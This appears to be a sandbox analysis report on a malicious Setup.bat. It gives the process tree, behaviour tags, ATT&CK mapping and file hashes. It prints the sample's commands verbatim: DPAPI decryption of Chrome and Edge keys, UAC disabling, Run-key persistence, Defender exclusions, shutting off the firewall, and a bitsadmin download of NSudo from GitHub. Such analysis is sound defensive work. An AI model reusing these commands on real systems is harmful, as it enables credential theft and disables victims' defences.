C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,111,11,152,43,226,32,145,73,137,243,42,18,79,120,126,126,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,241,173,50,248,48,233,4,229,245,201,146,154,115,98,33,115,73,47,145,149,219,0,76,224,75,238,207,77,243,118,177,201,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,36,144,200,68,162,221,179,194,26,103,200,200,85,181,197,147,65,240,114,77,146,124,55,46,108,10,161,238,71,0,78,7,48,0,0,0,156,77,116,228,75,203,177,250,227,93,81,127,228,115,6,183,240,205,136,99,238,243,170,198,71,189,51,118,193,34,101,52,151,58,240,142,129,23,129,118,83,129,205,128,158,223,219,198,64,0,0,0,249,223,58,23,28,104,226,94,161,154,21,121,253,209,176,1,240,233,220,232,89,251,132,38,156,9,151,153,25,81,61,189,122,16,236,108,252,247,143,85,136,120,142,14,33,105,40,81,30,203,46,2,241,141,19,71,126,65,251,155,4,135,68,82), $null, 'CurrentUser')4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,111,11,152,43,226,32,145,73,137,243,42,18,79,120,126,126,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,49,152,1,109,4,35,74,134,55,38,131,228,100,42,238,53,178,55,30,134,7,37,165,237,178,93,156,101,245,191,62,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,86,181,197,38,96,238,191,249,119,60,210,30,37,225,68,253,33,96,176,238,20,95,121,70,114,46,72,19,57,187,33,164,48,0,0,0,104,71,119,91,209,180,219,67,123,143,224,118,225,160,232,83,211,171,202,179,232,98,226,246,202,114,113,180,168,140,241,159,182,146,20,64,248,224,163,228,79,94,79,246,246,94,10,242,64,0,0,0,244,49,108,171,94,228,13,54,126,40,215,34,110,45,44,21,207,216,229,41,206,79,40,238,174,79,18,163,97,16,34,34,20,244,186,225,155,106,134,219,148,6,182,27,204,46,253,245,72,247,169,159,146,31,48,251,244,129,238,155,83,133,70,15), $null, 'CurrentUser')"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:3736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,111,11,152,43,226,32,145,73,137,243,42,18,79,120,126,126,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,49,152,1,109,4,35,74,134,55,38,131,228,100,42,238,53,178,55,30,134,7,37,165,237,178,93,156,101,245,191,62,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,86,181,197,38,96,238,191,249,119,60,210,30,37,225,68,253,33,96,176,238,20,95,121,70,114,46,72,19,57,187,33,164,48,0,0,0,104,71,119,91,209,180,219,67,123,143,224,118,225,160,232,83,211,171,202,179,232,98,226,246,202,114,113,180,168,140,241,159,182,146,20,64,248,224,163,228,79,94,79,246,246,94,10,242,64,0,0,0,244,49,108,171,94,228,13,54,126,40,215,34,110,45,44,21,207,216,229,41,206,79,40,238,174,79,18,163,97,16,34,34,20,244,186,225,155,106,134,219,148,6,182,27,204,46,253,245,72,247,169,159,146,31,48,251,244,129,238,155,83,133,70,15), $null, 'CurrentUser')4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"3⤵PID:4876
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
PID:208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"3⤵PID:232
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v system.dll /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"3⤵PID:4188
-
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v system.dll /t REG_SZ /d "C:\ProgramData\Update.vbs" /f4⤵
- Adds Run key to start application
PID:4948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.nM3Vf6IVq8""3⤵PID:2112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.nM3Vf6IVq8"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""3⤵PID:516
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"3⤵PID:3488
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "pip install pillow"3⤵PID:3808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"3⤵PID:3044
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid4⤵PID:1592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"3⤵PID:876
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID4⤵PID:1696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"3⤵PID:2580
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber4⤵PID:3576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"3⤵PID:1396
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:4620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"3⤵PID:2168
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid4⤵PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"3⤵PID:1988
-
C:\Windows\system32\getmac.exegetmac /NH4⤵PID:1456
-
-
-
C:\Users\Admin\AppData\Local\Temp\python-installer.exeC:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=03⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3808 -
C:\Windows\Temp\{409C94D1-373B-49D0-B283-D6041A0AB75C}\.cr\python-installer.exe"C:\Windows\Temp\{409C94D1-373B-49D0-B283-D6041A0AB75C}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=728 -burn.filehandle.self=732 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2252
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\C0D3X17 (123)\C0D3X17\Setup.bat" "1⤵PID:1636
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:4184
-
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs2⤵PID:2076
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe2⤵
- Download via BitsAdmin
PID:3772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""2⤵
- Command and Scripting Interpreter: PowerShell
PID:1592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force2⤵
- UAC bypass
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"2⤵
- Command and Scripting Interpreter: PowerShell
PID:3292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"2⤵
- Command and Scripting Interpreter: PowerShell
PID:1320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
PID:3308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"2⤵
- Command and Scripting Interpreter: PowerShell
PID:3936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"2⤵
- Command and Scripting Interpreter: PowerShell
PID:4628 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2488
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵PID:1336
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c447182⤵PID:3656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3333787353536142961,7192794440471926701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:32⤵PID:3484
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
PID:5052
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck1⤵
- Executes dropped EXE
PID:100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵PID:3904
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c447182⤵PID:2192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,1357349672286251164,17769670022579598718,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:32⤵PID:4220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5068 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c447182⤵PID:1996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:22⤵PID:3724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:32⤵PID:1880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:82⤵PID:3204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:12⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:12⤵PID:3036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:12⤵PID:5932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:12⤵PID:5956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:12⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:12⤵PID:2200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:12⤵PID:5028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:12⤵PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:12⤵PID:2596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵PID:2900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:12⤵PID:5732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵PID:5740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:82⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:82⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵PID:4056
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c447182⤵PID:2396
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2456
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5172
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1BITS Jobs
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD54ccdc6e8eb18bcd9f860b915234ae837
SHA1ecbf9b8162b07e7358e3dfe6aeea606c2619ca35
SHA256a563d3f552fa9ad0cedbce7181c5101e8ddff5ba57408cddf93a53ed85bd03ab
SHA5129a7f2bbaa74b92c1514af744fb8a133814f6a70945d1f675cb9405656590a689f9ad8349caaad7831ab3afd8fe714692b71e479b0d0e334d72402d91c7bef4ac
-
Filesize
12KB
MD55c813d1d422ea04aaad14e891d4bcc68
SHA1940bb60f372faa56040098b113a3be320bc7ab89
SHA256cbe25f6207062770c8a0f7a4812150619bb270402d692c864e7f1ddf9c07dbe4
SHA512a00aff7563a75bdbb5234d9b92a4253263e183c7f35d57f2144716fd9e5b4b5b40150cbcfa6ba947ae35300afea50f23379ff35a10f70a65c8953d2cffdf7647
-
Filesize
50KB
MD5f81f6d5d8c88fdd397c86a0f6ced3eb3
SHA1c6706588244a0eb0ab2e150d2e0023519ceb788a
SHA2566965f905ab8e31879dc69d3578fcb4984e52a9b098802c0be948aed57838ea8a
SHA51259cb452c03f6751eebc86fb8597574722624cfb5be2390f16db58e9beee47e3ceb9dafa1548bad26e687e33c59a63b8042c6e7c09da2f116176bf55942d93c7a
-
Filesize
138KB
MD56d0b8b4e7871bd202c780412cda520df
SHA18f11a4e7acaf6b2ab1d37fe8d511a322c59629c5
SHA256f0bfddfef65bca39c6a47c59c6907f493d39d0ec3e7f16211c8257cc06d54837
SHA512dac30fda8e5c868266dc22f192d66ae743222b7f7495894472bb3c85aa4dd4d78c84dc074624287c613af05349f5a0f36e8b8e1d7be56977438e1044e6e1dfd8
-
Filesize
310KB
MD5a5f6c3e0ab7a7b484ea47fd1c954e18c
SHA17a66f9ac2472bccb786c670d44fca79c2dbbd4d1
SHA25661817297ad5d4dcee3c8a56a099c90b080896cb8fc16ed2a35b49d570a9ec831
SHA51274dbd2972cad4c2ada4804bc2b457177beb9eaa5271c530a316bb2a0d7a55e3c21c3753a184362a6402908f9ba482b5134fcc1bc8efc70c9b92d36e9008264e0
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD5712863a69a677c533d36f98fc92bdc9b
SHA16e8dea1511842645c4bd5f3f5638c45609d3e5e2
SHA256ccbf3b1431a5bb461967f3c24ddb12fcc8fcdf2ad871f7d7226d886cdf75b864
